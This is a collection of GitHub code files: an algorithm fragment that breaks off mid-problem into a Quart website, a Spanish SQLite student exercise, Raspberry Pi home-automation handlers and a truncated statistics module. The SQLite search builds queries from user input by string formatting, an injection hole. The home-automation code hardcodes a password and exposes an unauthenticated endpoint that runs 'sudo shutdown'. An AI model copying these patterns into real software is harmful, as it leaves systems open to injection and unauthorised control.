range(len(residue_list)):\n if residue_list[i] is not None:\n residue_list_copy = residue_list.copy()\n limit_copy = limit\n ai_count_list.insert(i, ai_count)\n\n if i != 0:\n residue_list_copy[i - 1] = None\n if i != len(food) - 1:\n residue_list_copy[i + 1] = None\n residue_list_copy[i] = None\n print(\"Residue: \", residue_list_copy)\n\n limit_copy -= 1\n ai_count_list[i] += int(food[i])\n ai_count_list[i] = self.find_ai(ai_count_list[i], food, residue_list_copy, limit_copy)\n print(\"Branch Line Ai: \", ai_count_list[i])\n else:\n ai_count_list.insert(i, None)\n\n while ai_count_list.__contains__(None):\n ai_count_list.remove(None)\n\n if len(ai_count_list) == 0:\n return int(food[0])\n else:\n return max(ai_count_list)\n\n \"\"\"\n 最舒适的路线\n 时间限制:5000 ms | 内存限制:65535 KB\n 难度:5\n 描述\n 异形卵潜伏在某区域的一个神经网络中。其网络共有N个神经元(编号为1,2,3,…,N),这些神经元由M条通道连接着。\n 两个神经元之间可能有多条通道。异形卵可以在这些通道上来回游动,但在神经网络中任一条通道的游动速度必须是一定的。\n 当然异形卵不希望从一条通道游动到另一条通道速度变化太大,否则它会很不舒服。现在异形卵聚居在神经元S点,\n 想游动到神经元T点。它希望选择一条游动过程中通道最大速度与最小速度比尽可能小的路线,也就是所谓最舒适的路线。\n \n 输入\n 第一行: K 表示有多少组测试数据。 \n 接下来对每组测试数据:\n 第1行: N M\n 第2~M+1行: Xi Yi Vi (i=1,…..,M)\n 表示神经元Xi 到神经元Yi之间通道的速度必须是Vi\n 最后一行: S T ( S  T )\n \n 【约束条件】\n 2≤K≤5 1 /\n path = '/'\n if path != request.path:# redirect if something has changed\n return redirect(path)\n\nif sys.platform != 'linux':\n @app.after_request\n async def cache_headers(r):\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate, public, max-age=0\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n return r\n\n@app.before_serving\nasync def schedule_cache():\n asyncio.ensure_future(cache.recache(cache))\n\n@app.route('/')\nasync def homepage():\n return await render_template(\"index.html\", projects=cache.projects, socials=cache.socials, misc_info=misc_info(request))\n\n@app.route('/legal')\nasync def legal():\n return await render_template(\"legal.html\", characters=cache.characters, misc_info=misc_info(request))\n\n@app.route('/safety')\nasync def safety():\n return await render_template(\"safety.html\", misc_info=misc_info(request, safety=True))\n\n@app.route('/hotlines')\nasync def hotlines():\n return await render_template(\"hotlines.html\", misc_info=misc_info(request, safety=True))\n\n@app.route('/bongo')\nasync def bongo():\n return await render_template(\"bongo.html\", bongo_images=cache.bongo_images, misc_info=misc_info(request))\n\n@app.route('/discord')\nasync def discord():\n return redirect(cache.socials['discord'])\n\n@app.route('/license')\n@app.route('/license.txt')\nasync def license():\n return await app.send_static_file(\"license.txt\")\n\n@app.route('/robots.txt')\nasync def robots():\n return await app.send_static_file(\"robots.txt\")\n\n@app.route('/sitemap.xml')\nasync def sitemap():\n return await app.send_static_file(\"sitemap.xml\")\n\n@app.route('/files/')\nasync def old_file_route(file_name):\n return await app.send_static_file(file_name)\n\n@app.errorhandler(404)\nasync def page_not_found(e):\n if request.path in [\"/favicon.ico\", \"/apple-touch-icon.png\", \"/browserconfig.xml\"]:# Favicons!\n return await app.send_static_file(f\"favicon{request.path}\")\n return await render_template(\"404.html\", misc_info=misc_info(request, \"\")), 404\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8000, debug=True)\n","repo_name":"DuckMasterAl/website","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"16113642830","text":"\"\"\"\nEjercicio N° 1\n\nEn este ejercicio tendréis que crear una tabla llamada Alumnos que constará de tres columnas: la columna id de tipo entero, la columna nombre que será de tipo texto y la columna apellido que también será de tipo texto.\n\nUna vez creada la tabla, tenéis que insertarle datos, como mínimo tenéis que insertar 8 alumnos a la tabla.\n\nPor último, tienes que realizar una búsqueda de un alumno por nombre y mostrar los datos por consola.\n\"\"\"\n\nimport sqlite3\nimport sys\n\nruta = sys.path\n\nconn = sqlite3.connect(ruta[0]+\"/users.db\")\n\ncursor = conn.cursor()\n\ndef select_alumnos():\n\n rows = cursor.execute(\"SELECT * FROM Alumnos\")\n\n print(\"Los Alumnos Son: \\n\")\n\n for row in rows:\n print(row)\n\n print(\"\\n\")\n\nselect_alumnos()\n\ndef insert_alumnos(nombre, apellido):\n\n conn = sqlite3.connect(ruta[0]+\"/users.db\")\n\n cursor = conn.cursor()\n\n sql_query = \"\"\"INSERT INTO Alumnos(nombre, apellido) VALUES(?, ?);\"\"\"\n\n cursor.execute(sql_query, (nombre, apellido))\n\n conn.commit()\n\n cursor.close()\n\n conn.close()\n\nentradas = input(\"Deseas agregar un nuevo Registro S/N.?: \")\n\nwhile entradas.lower() != \"n\":\n\n nombre = None\n apellido = None\n\n nombre = input(\"Ingrese el Nombre del nuevo alumno: \")\n apellido = input(\"Ingrese el apellido del nuevo alumno: \")\n\n insert_alumnos(nombre, apellido)\n\n continuar = input(\"Deseas agregar un nuevo alumno S/N: \")\n\n if continuar.lower() != \"s\":\n break\n\ndef search_alumnos(nombre):\n\n rows = cursor.execute(f\"SELECT nombre, apellido FROM Alumnos WHERE nombre = '{nombre}'\")\n\n #dato = rows.fetchone()\n #print(dato)\n print(\"Nombre | Apellido \\n\")\n for row in rows:\n print(row)\n\nprint(\"Vamos a buscar un alumno ingresando el nombre\")\nnombre_buscado = input(\"Ingrese el nombre a buscar: \")\n\nsearch_alumnos(nombre_buscado)\n\ncursor.close()\n\nconn.close()","repo_name":"alpolo1991/Open-BootCamp","sub_path":"Curso_de_Python/tema_11_sqlite/ejercicio_1.py","file_name":"ejercicio_1.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74433756757","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport datetime\nfrom aiohttp import web\nfrom multiprocessing import Process\nfrom email import encoders\nfrom email.header import Header, decode_header\nfrom email.mime.text import MIMEText\nfrom email.parser import Parser\nfrom email.utils import parseaddr, formataddr\nimport poplib\nimport re, time, json, logging, hashlib, base64, asyncio, os\nimport smtplib\nfrom urllib import request\nimport time\nimport aiomysql\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom bs4 import BeautifulSoup\nimport requests\nfrom coroweb import get, post\nfrom orm import execute, select\nfrom motor import zheng, fan, stopC, zheng2, fan2, stop2\nfrom picamera import PiCamera\nimport time, threading\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom pingUtil import getHome\nfrom predict import get_winstate\nfrom killps import kill_video, kill_natapp\nfrom models import User\nimport pytz\n\n__author__ = 'zhou'\n\n' url handlers '\n\nimport RPi.GPIO as GPIO\nimport Adafruit_DHT\n\nimport sys\nfrom sys import path\n\npath.append('/home/pi')\nimport config_default\n\n# 输入邮件地址, 口令和POP3服务器地址:\nemail_config = config_default.config['email']\n\nemail = email_config['email'] # 你的email 的地址\nfrom_addr = email_config['from_addr'] # 你的email 的地址\npassword = email_config['password'] # 你的email 的密码\nto_addr = email_config['to_addr'] # email 的目的地址\nsmtp_server = email_config['smtp_server'] # smtp服务器 的地址\npop3_server = email_config['pop3_server'] # pop3服务器 的地址\nchuang_state = None\ndeng_state = None\nsched = None\nCOOKIE_NAME = 'awesession'\n_COOKIE_KEY = \"configs.session.secret\"\n\n\n# 计算加密cookie:\ndef user2cookie(user, max_age):\n # build cookie string by: id-expires-sha1\n expires = str(int(time.time() + max_age))\n s = '%s-%s-%s-%s' % (user['id'], user['passwd'], expires, _COOKIE_KEY)\n L = [user['id'], expires, hashlib.sha1(s.encode('utf-8')).hexdigest()]\n return '-'.join(L)\n\n\nasync def cookie2user(cookie_str):\n '''\n Parse cookie and load user if cookie is valid.\n '''\n user = None\n if not cookie_str:\n return None\n try:\n L = cookie_str.split('-')\n if len(L) != 3:\n return None\n uid, expires, sha1 = L\n if int(expires) < time.time():\n return None\n logging.info(\"-----------------\" + uid)\n if uid == '1':\n user = {'id': '1', 'passwd': '123456'}\n if user is None:\n return None\n s = '%s-%s-%s-%s' % (uid, user['passwd'], expires, _COOKIE_KEY)\n if sha1 != hashlib.sha1(s.encode('utf-8')).hexdigest():\n logging.info('invalid sha1')\n return None\n user['passwd'] = '******'\n return user\n except Exception as e:\n logging.exception(e)\n return None\n\n\ndef init_deng_state():\n '''\n 灯的初始状态\n '''\n global deng_state\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(12, GPIO.OUT)\n GPIO.setup(40, GPIO.IN)\n if GPIO.input(12) == 1:\n deng_state = 'open'\n else:\n deng_state = 'close'\n\ndef init_chuang_state():\n '''\n 窗帘的初始状态,是用tensorflow来判断的,这个地点也是此项目的亮点\n '''\n global chuang_state\n img_url = take_camera()\n win_state = get_winstate(img_url)\n if win_state == 'chuang_close':\n chuang_state = 'close'\n if win_state == 'chuang_open':\n chuang_state = 'open'\n print('+++++++++++window_state++++++++++++++' + chuang_state)\n\n\ndef guess_charset(msg):\n charset = msg.get_charset()\n if charset is None:\n content_type = msg.get('Content-Type', '').lower()\n pos = content_type.find('charset=')\n if pos >= 0:\n charset = content_type[pos + 8:].strip()\n return charset\n\n\ndef decode_str(s):\n value, charset = decode_header(s)[0]\n if charset:\n value = value.decode(charset)\n return value\n\n\ndef print_info(msg, indent=0):\n value = decode_str(msg.get('Subject', ''))\n hdr, addr = parseaddr(msg.get('From', ''))\n if (msg.is_multipart()):\n parts = msg.get_payload()\n for n, part in enumerate(parts):\n print('%spart %s' % (' ' * indent, n))\n print('%s--------------------' % (' ' * indent))\n print_info(part, indent + 1)\n else:\n content_type = msg.get_content_type()\n if content_type == 'text/plain' or content_type == 'text/html':\n content = msg.get_payload(decode=True)\n charset = guess_charset(msg)\n if charset:\n content = content.decode(charset)\n print('%sText: %s' % (' ' * indent, content + '...'))\n else:\n print('%sAttachment: %s' % (' ' * indent, content_type))\n return addr, value, content\n\n\n@get('/api/schJob')\nasync def sch_job():\n '''\n 定时查询邮件的任务,参考的是廖雪峰的网站\n '''\n server = poplib.POP3(pop3_server)\n server.set_debuglevel(0)\n server.user(email)\n server.pass_(password)\n # stat()返回邮件数量和占用空间:\n # print('Messages: %s. Size: %s' % server.stat())\n # list()返回所有邮件的编号:\n resp, mails, octets = server.list()\n # 可以查看返回的列表类似[b'1 82923', b'2 2184', ...]\n # print(mails)\n\n # 获取最新一封邮件, 注意索引号从1开始:\n index = len(mails)\n resp, lines, octets = server.retr(index)\n\n # lines存储了邮件的原始文本的每一行,\n # 可以获得整个邮件的原始文本:\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n # 稍后解析出邮件:\n msg = Parser().parsestr(msg_content)\n fro, sub = print_info(msg)\n # print(sub)\n if \"1053604549@qq.com\" == fro:\n if \"枕边头套\" == sub:\n server.dele(index)\n if \"关灯\" == sub:\n await api_register_user()\n server.dele(index)\n if \"开灯\" == sub:\n await api_register_users()\n server.dele(index)\n if \"开窗\" == sub:\n chuangkan()\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n if \"关窗\" == sub:\n chuangguan()\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n if \"房间\" == sub:\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n if \"关窗开灯\" == sub:\n chuangguan()\n await api_register_users()\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n # 关闭连接:\n server.quit()\n\n\n@get('/api/shutdownlinux')\ndef shutdownlinux():\n os.system(\"sudo shutdown -h now\")\n\n\n@get('/api/test')\ndef test():\n logging.info(\"test---test\")\n\n\n@get('/api/run')\nasync def run():\n '''\n 记录跑步的时间,这是我的个人生活\n '''\n await execute('insert into run_rec(state)values(?)', ('run'))\n return \"success\"\n\n\n@post('/api/login')\ndef login(*, username, passwd):\n logging.info(username + '-------------------------------' + passwd)\n if username == '001' and passwd == '123456':\n user = {'username': '001', 'passwd': '123456', 'id': '1', 'state': 'success'}\n r = web.Response()\n r.set_cookie(COOKIE_NAME, user2cookie(user, 86400), max_age=86400, httponly=True)\n user['passwd'] = '******'\n r.content_type = 'application/json'\n r.body = json.dumps(user, ensure_ascii=False).encode('utf-8')\n return r\n return \"error\"\n\n\n@get('/signin')\ndef signin():\n return \"login\"\n\n\n@get('/api/camera')\nasync def camera():\n '''\n 拍照,并在浏览器上显示\n '''\n file_url = take_camera()\n import base64\n img_stream = ''\n with open(file_url, 'rb') as img_f:\n img_stream = img_f.read()\n img_stream = base64.b64encode(img_stream)\n\n return img_stream\n\n\n@get('/api/shutdown')\nasync def shutdown():\n '''\n 用requests模块,发送关闭计算机的指令\n '''\n r0 = requests.get(\"http://W4HUDGN5ZEIGEHX:5000/shutdown\")\n return \"success\"\n\n\n@get('/api/kanchuang')\nasync def kanchuang():\n '''\n 控制窗户\n '''\n t = threading.Thread(target=chuangkan, name='LoopThread0')\n t.start()\n t.join\n return \"success\"\n\n\n@get('/api/guanchuang')\nasync def guanchuang():\n t = threading.Thread(target=chuangguan, name='LoopThread1')\n t.start()\n t.join\n return \"success\"\n\n\n@get('/api/stop')\nasync def stop():\n stopC()\n return \"success\"\n\n\n@get('/api/stopKong')\nasync def stopKong():\n '''t = threading.Thread(target=stop2, name='LoopThread0')\n t.start()\n t.join'''\n stop2();\n return \"success\"\n\n\n@get('/api/openKong')\nasync def openKong():\n zheng2()\n return \"success\"\n\n\n@get('/api/closeKong')\nasync def closeKong():\n fan2()\n return \"success\"\n\n\n@get('/api/kongKong')\nasync def kongKong():\n t = threading.Thread(target=kongtiao, name='kongtiao')\n t.start()\n t.join\n\n return \"success\"\n\n\n@get('/api/shutDown')\nasync def api_register_user():\n '''\n 关灯\n '''\n GPIO.output(12, GPIO.LOW)\n await execute('insert into light(state)values(?)', ('close'))\n global deng_state\n deng_state = 'close'\n return \"success\"\n\n\n@get('/api/open')\nasync def api_register_users():\n '''\n 开灯\n '''\n GPIO.output(12, GPIO.HIGH)\n await execute('insert into light(state)values(?)', ('open'))\n global deng_state\n deng_state = 'open'\n return \"success\"\n\n\n@get('/api/deng')\nasync def deng_caozuo():\n global deng_state\n if deng_state == 'close':\n GPIO.output(12, GPIO.HIGH)\n await execute('insert into light(state)values(?)', ('open'))\n deng_state = 'open'\n else:\n GPIO.output(12, GPIO.LOW)\n await execute('insert into light(state)values(?)', ('close'))\n deng_state = 'close'\n return \"success\"\n\n\n@get('/api/taideng')\nasync def taideng():\n GPIO.setup(16, GPIO.OUT)\n GPIO.output(16, GPIO.HIGH)\n time.sleep(4)\n GPIO.output(16, GPIO.LOW)\n return \"success\"\n\n\n@get('/api/showTem')\nasync def api_register_userss():\n res = await select('select temp,humidity,out_tem,out_hum from temp_hum order by add_time desc limit 1', ());\n return json.dumps(res[0])\n\n\n@get('/api/getTem')\ndef getTem():\n '''\n 获取室内温度与湿度\n '''\n sensor = Adafruit_DHT.DHT11\n gpio = 17\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n return {\n '温度': int(temperature),\n '湿度': int(humidity)\n }\n\n\n@get('/api/openVideo')\nasync def openVideo():\n '''\n 打开摄像头的进程,这个进程启动的是https://github.com/waveform80/pistreaming这个项目,\n 用进程来启动而不是用线程来启动这个项目,是因为进程能够,用代码来关闭\n '''\n p = Process(target=videoCmd)\n p.start()\n return \"success\"\n\n\n@get('/api/stopVideo')\nasync def stopVideo():\n '''\n 杀掉摄像的进程\n '''\n kill_video()\n return \"success\"\n\n\n@get('/api/stopNatapp')\nasync def stopNatapp():\n newRoomUrl()\n return \"success\"\n\n\n@get('/api/pauseSch')\nasync def pauseSch():\n '''\n 暂停任务\n '''\n pause_sch()\n return \"success\"\n\n\ndef getWeather():\n htmlData = request.urlopen(\"https://tianqi.moji.com/weather/china/shandong/lixia-district\").read().decode('utf-8')\n soup = BeautifulSoup(htmlData, 'html.parser')\n weather = soup.find('div', attrs={'class': \"wea_weather clearfix\"})\n temp1 = weather.find('em').get_text() # 当前温度\n temp2 = weather.find('b').get_text()\n AQI = soup.select(\".wea_alert.clearfix > ul > li > a > em\")[0].get_text()\n H = soup.select(\".wea_about.clearfix > span\")[0].get_text() # 湿度\n S = soup.select(\".wea_about.clearfix > em\")[0].get_text() # 风速\n return temp1, H\n\n\ndef start_sch():\n global sched\n sched = AsyncIOScheduler()\n # sched.add_job(sch_job, 'cron', hour='8-20', minute=\"*/10\",id='my_job_id')\n # sched.add_job(sendEmail,'cron',hour='22', minute=\"30\",args=[\"枕边头套\"],id='my_job_id2')\n sched.add_job(newRoomUrl, 'cron', hour='9', minute=\"30\", timezone=pytz.utc, id='my_job_id6')\n sched.add_job(tem_job, 'cron', minute=\"*/30\", id='my_job_id5')\n sched.add_job(resume_job, 'cron', hour='9', minute=\"30\", timezone=pytz.utc, id='my_job_id4')\n # sched.add_job(getHome_job, 'cron', day_of_week='mon-fri', hour='10-12', minute=\"*/1\", timezone=pytz.utc,id='my_job_id3')\n sched.add_job(getHome_job, 'cron',day_of_week='mon-fri', hour='10-12', second='*/5', timezone=pytz.utc,id='my_job_id3')\n sched.add_job(delMyUrl, 'cron', hour='15', timezone=pytz.utc, id='my_job_id7')\n sched.add_job(cpufengshan, 'cron', minute=\"*/10\", id='my_job_id8')\n sched.start()\n\n\ndef cpufengshan():\n file = open(\"/sys/class/thermal/thermal_zone0/temp\")\n # 读取结果,并转换为浮点数\n temp = float(file.read()) / 1000\n logging.info(\"cputemp++++++++\" + str(temp))\n if temp > 60:\n GPIO.setup(18, GPIO.OUT)\n GPIO.output(18, GPIO.HIGH)\n elif temp < 46:\n GPIO.setup(18, GPIO.OUT)\n GPIO.output(18, GPIO.LOW)\n\n\ndef delMyUrl():\n server = poplib.POP3(pop3_server)\n server.set_debuglevel(0)\n server.user(email)\n server.pass_(password)\n resp, mails, octets = server.list()\n for index in range(len(mails)):\n resp, lines, octets = server.retr(index + 1)\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n msg = Parser().parsestr(msg_content)\n fro, sub, content = print_info(msg)\n if \"hello, send by Python...\" == content:\n server.dele(index + 1)\n # 关闭连接:\n server.quit()\n\n\ndef pause_sch():\n sched.get_job('my_job_id3').pause()\n\n\ndef resume_job():\n sched.get_job('my_job_id3').resume()\n\n\nasync def tem_job():\n '''\n 爬取天气\n '''\n out_temp, out_hum = getWeather()\n hum_index = out_hum.index(\"%\")\n out_hum = out_hum[3:hum_index]\n sensor = Adafruit_DHT.DHT11\n gpio = 17\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n await execute('insert into temp_hum(temp,humidity,out_tem,out_hum)values(?,?,?,?)',\n (temperature, humidity, out_temp, out_hum))\n\n\ndef sendEmail(suc):\n msg = MIMEText('hello, send by Python...', 'plain', 'utf-8')\n msg['From'] = _format_addr('你是谁 <%s>' % from_addr)\n msg['To'] = _format_addr('你是谁 <%s>' % to_addr)\n msg['Subject'] = Header(suc, 'utf-8').encode()\n server = smtplib.SMTP(smtp_server, 25)\n server.set_debuglevel(0)\n server.login(from_addr, password)\n server.sendmail(from_addr, [to_addr], msg.as_string())\n server.quit()\n\n\ndef _format_addr(s):\n name, addr = parseaddr(s)\n return formataddr((Header(name, 'utf-8').encode(), addr))\n\n\ndef chuangkan():\n zheng()\n time.sleep(7)\n stopC()\n\n\ndef chuangguan():\n fan()\n time.sleep(7)\n stopC()\n\n\ndef sendEmailFile(url):\n msg = MIMEMultipart()\n msg['From'] = _format_addr('你是谁 <%s>' % from_addr)\n msg['To'] = _format_addr('你是谁 <%s>' % to_addr)\n msg['Subject'] = Header('myroom', 'utf-8').encode()\n msg.attach(MIMEText('

Hello

' +\n '

' +\n '', 'html', 'utf-8'))\n # 添加附件就是加上一个MIMEBase,从本地读取一个图片:\n with open(url, 'rb') as f:\n # 设置附件的MIME和文件名,这里是png类型:\n mime = MIMEBase('image', 'jpg', filename='test.jpg')\n # 加上必要的头信息:\n mime.add_header('Content-Disposition', 'attachment', filename='test.jpg')\n mime.add_header('Content-ID', '<0>')\n mime.add_header('X-Attachment-Id', '0')\n # 把附件的内容读进来:\n mime.set_payload(f.read())\n # 用Base64编码:\n encoders.encode_base64(mime)\n # 添加到MIMEMultipart:\n msg.attach(mime)\n server = smtplib.SMTP(smtp_server, 25)\n server.set_debuglevel(0)\n server.login(from_addr, password)\n server.sendmail(from_addr, [to_addr], msg.as_string())\n server.quit()\n\n\ndef take_camera():\n file_url = \"\"\n with PiCamera() as camera:\n time.sleep(0.5)\n camera.resolution = (320, 240)\n file_url = \"/home/pi/img/\" + str(int(time.time())) + \".jpg\"\n camera.capture(file_url)\n return file_url\n\n\nasync def getHome_job():\n if deng_state == \"close\":\n if GPIO.input(40) == 1:\n # print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + \" Smoe is here !\")\n chuangguan()\n await api_register_users()\n # else:\n # print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + \" Nobody !\")\n\ndef videoCmd():\n val = os.system(\"python3.7 /home/pi/web/www/server.py\")\n\n\ndef kongtiao():\n zheng2()\n time.sleep(1)\n stop2()\n time.sleep(0.5)\n fan2()\n time.sleep(1)\n stop2()\n\n\ndef newRoomUrl():\n url = \"\"\n index_url = \"\"\n file_data = \"\"\n file_url = \"/home/pi/natapp/myvideo/\"\n html_url = \"/home/pi/natapp/\"\n file_html = '/home/pi/web/www/static/index.html'\n kill_natapp()\n if (os.path.exists(html_url + 'nohup.out')):\n os.remove(html_url + 'nohup.out')\n os.system(\"nohup \" + html_url + \"natapp > \" + html_url + \"nohup.out &\")\n time.sleep(1)\n if (os.path.exists(file_url + 'nohup.out')):\n os.remove(file_url + 'nohup.out')\n os.system(\"nohup \" + file_url + \"natapp > \" + file_url + \"nohup.out &\")\n time.sleep(1)\n with open(html_url + 'nohup.out', 'r') as f:\n text_lines = f.readlines()\n for line in text_lines:\n if line.find(\"established at\") > 0:\n index_url = line.split(\"established at\")[1].strip()\n with open(file_url + 'nohup.out', 'r') as f:\n text_lines = f.readlines()\n for line in text_lines:\n if line.find(\"established at\") > 0:\n url = line.split(\"established at\")[1].strip()\n logging.info(\"+++++++\" + index_url)\n with open(file_html, 'r', encoding=\"utf-8\") as f:\n text_lines = f.readlines()\n for line in text_lines:\n if line.find(\"//update\") > 0:\n line = \"var videoUrl ='\" + url + \"';//update\\n\"\n logging.info(line)\n file_data += line\n with open(file_html, \"w\", encoding=\"utf-8\") as f:\n f.write(file_data)\n sendEmail(index_url)\n","repo_name":"zsdnishishui/myroom","sub_path":"www/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":18615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"33758410001","text":"import numpy as np\nimport gvar as gv\nimport lsqfit\nimport jax\nimport jax.numpy as jnp\nimport vegas\n\njax.config.update(\"jax_enable_x64\", True)\n\n# Info criteria\ndef BAIC_fit(fr):\n prior_stats = prior_stats_fit(fr)\n chi2_prior = prior_stats['chi2_prior']\n \n BAIC = fr.chi2 - chi2_prior + 2 * len(fr.p.keys())\n return BAIC\n\n\ndef BPIC_linear_fit(fr, test_data, design_mat):\n tensors = tensors_linear_fit(fr, test_data, design_mat)\n chi2_prior = tensors['chi2_prior']\n hess_prior = tensors['hess_prior']\n cov_best_fit = tensors['cov_best_fit']\n \n BPIC = fr.chi2 - chi2_prior - 0.5 * np.einsum('ba,ab->', hess_prior, cov_best_fit) + 3 * len(fr.p.keys())\n\n return BPIC\n\ndef BPIC_nonlinear_fit(fr, test_data, model_derivs):\n tensors = tensors_nonlinear_fit(fr, test_data, model_derivs)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n grad_prior = tensors['grad_prior']\n hess_prior = tensors['hess_prior']\n cov_best_fit = tensors['cov_best_fit']\n cov_best_fit_2 = tensors['cov_best_fit_2']\n T = tensors['T']\n\n \n int_lead = -chi2_prior\n int_sub = -0.5 * np.einsum('ba,ab->', hess_prior, cov_best_fit) + 0.5 * np.einsum('d,cba,abcd->', grad_prior, T, cov_best_fit_2)\n\n if np.abs(int_sub) < np.abs(int_lead):\n integral = int_lead + int_sub\n else:\n integral = int_lead\n \n BPIC = fr.chi2 + integral + 3 * len(fr.p.keys())\n return BPIC\n\n\ndef PPIC_linear_fit(fr, test_data, design_mat):\n tensors = tensors_linear_fit(fr, test_data, design_mat)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n cov_best_fit = tensors['cov_best_fit']\n \n yraw = test_data['yraw']\n delta_indv = yraw - gv.mean(fr.fcn(fr.x,fr.p))\n grad_indv_data = -2 * np.einsum('ba,bc,dc->da', design_mat, cov_data_inv, delta_indv)\n hess_indv_data = 2 * np.einsum('ba,bc,cd->ad', design_mat, cov_data_inv, design_mat)\n \n log_args = 1 + 0.5 * np.einsum('cba,ab->c', 0.25 * np.einsum('ab,ac->abc', grad_indv_data, grad_indv_data) - 0.5 * hess_indv_data, cov_best_fit)\n\n PPIC = fr.chi2 - chi2_prior - 2 * np.sum(np.log(log_args)) + 2 * len(fr.p.keys())\n \n return PPIC\n\ndef PPIC_nonlinear_fit(fr, test_data, model_derivs):\n tensors = tensors_nonlinear_fit(fr, test_data, model_derivs)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n cov_best_fit = tensors['cov_best_fit']\n cov_best_fit_2 = tensors['cov_best_fit_2']\n T = tensors['T']\n \n \n yraw = test_data['yraw']\n delta_indv = yraw - gv.mean(fr.fcn(fr.x,fr.p))\n grad_indv_data = -2 * np.einsum('ba,bc,dc->da', model_derivs['d1_model'], cov_data_inv, delta_indv)\n hess_indv_data = 2 * (-np.einsum('cba,cd,ed->eab', model_derivs['d2_model'], cov_data_inv, delta_indv) + np.einsum('ba,bc,cd->ad', model_derivs['d1_model'], cov_data_inv, model_derivs['d1_model']))\n \n int_leads = 1.0\n int_subs = 0.5 * np.einsum('cba,ab->c', 0.25 * np.einsum('ab,ac->abc', grad_indv_data, grad_indv_data) - 0.5 * hess_indv_data, cov_best_fit) + 0.25 * np.einsum('ed,cba,abcd->e', grad_indv_data, T, cov_best_fit_2)\n \n int_subs[np.abs(int_subs)>=np.abs(int_leads)]=0\n \n log_args=int_leads+int_subs\n \n PPIC = fr.chi2 - chi2_prior - 2 * np.sum(np.log(log_args)) + 2 * len(fr.p.keys())\n return PPIC\n\n\ndef AIC_fit(fr):\n AIC = fr.chi2 + 2 * len(fr.p.keys())\n return AIC\n\n\ndef PAIC_linear_fit(fr, test_data, design_mat):\n PAIC = BPIC_linear_fit(fr, test_data, design_mat)\n return PAIC\n\ndef PAIC_from_vegas(fr):\n def chi_sq(p):\n return gv.chi2(fr.y, fr.fcn(fr.x, p))\n\n def pdf(p):\n return np.exp(-chi_sq(p)/2)\n\n exp_val = vegas.PDFIntegrator(fr.p, pdf=pdf, limit=20)\n\n try:\n integral = exp_val(chi_sq, neval=100, nitn=8)\n except ValueError:\n return 999.\n\n PAIC = gv.mean(integral + 2 * len(fr.p.keys()))\n\n return PAIC\n \ndef PAIC_nonlinear_fit(fr, test_data, model_derivs):\n tensors = tensors_nonlinear_fit(fr, test_data, model_derivs)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n hess_prior = tensors['hess_prior']\n cov_best_fit = tensors['cov_best_fit']\n cov_best_fit_2 = tensors['cov_best_fit_2']\n T = tensors['T']\n \n \n ND = test_data['ND']\n delta = gv.mean(fr.y) - gv.mean(fr.fcn(fr.x,fr.p))\n chi2_data = fr.chi2 - chi2_prior\n grad_data = -2 * np.einsum('ba,bc,c->a', model_derivs['d1_model'], ND * cov_data_inv, delta)\n \n \n int_lead = chi2_data\n int_sub = len(fr.p.keys())\n\n if np.abs(int_sub) < np.abs(int_lead):\n integral = int_lead + int_sub\n else:\n integral = int_lead\n \n PAIC = integral + 2 * len(fr.p.keys())\n return PAIC\n\n\ndef naive_fit(fr):\n return fr.chi2\n\n\n\ndef get_model_IC(fr, test_data, design_mat=None, model_derivs=None, IC=\"BAIC\", return_prob=False, full_BC=False, quiet_full_BC=False):\n \"\"\"\n Compute incfomration criteria from log likelihood (LL) for a given fit.\n space of all models, which should be done separately.\n Relation to info criteria:\n LL = -1/2 * IC\n Args:\n fr: Fit result object, from lsqfit module.\n test_data: dictionay of data\n design_mat: Default None. The design matrix for linear fits\n model_derivs: Default None. Dictionary of model derivatives for nonlinear fits\n IC: Which info criterion to use. Options: BAIC (default), AIC, BPIC, PAIC, PPIC, naive.\n return_prob: Specifies if model probability is returned\n full_BC: specifies if the full bias correction is used\n quiet_full_BC: Suppresses full_BC warning in cases of data subset selection.\n Returns:\n IC: the information criteria value\n np.exp(LL): the (unnormalized) model probability\n \"\"\"\n \n if design_mat is None:\n if model_derivs is None:\n assert IC == \"AIC\" or IC == \"BAIC\" or IC == \"naive\"\n else:\n assert 'd1_model' in model_derivs.keys()\n assert 'd2_model' in model_derivs.keys()\n assert 'd3_model' in model_derivs.keys()\n is_linear = False\n else:\n is_linear = True\n \n\n if IC == \"BAIC\":\n LL = -0.5 * BAIC_fit(fr)\n elif IC == \"BPIC\":\n if is_linear:\n LL = -0.5 * BPIC_linear_fit(fr, test_data, design_mat)\n else: \n LL = -0.5 * BPIC_nonlinear_fit(fr, test_data, model_derivs)\n elif IC == \"PPIC\":\n if is_linear:\n LL = -0.5 * PPIC_linear_fit(fr, test_data, design_mat)\n else:\n LL = -0.5 